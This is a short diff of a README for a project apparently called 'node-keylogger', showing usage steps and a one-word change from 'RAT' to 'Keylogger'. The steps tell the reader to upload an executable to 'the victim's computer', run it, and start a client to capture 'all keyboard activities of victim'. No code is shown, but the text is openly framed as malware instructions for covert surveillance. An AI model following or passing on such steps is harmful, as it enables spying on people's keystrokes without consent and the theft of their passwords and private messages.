noirrs/node-keylogger/README.md

 * Upload the exe file to the victim's computer and run it (double click)
 * Run client.js file on your own computer `npm run client`

-   **Now RAT system is on, you can get all keyboard activities of victim**
+   **Now Keylogger system is on, you can get all keyboard activities of victim**

 ## 🦾 Used technologies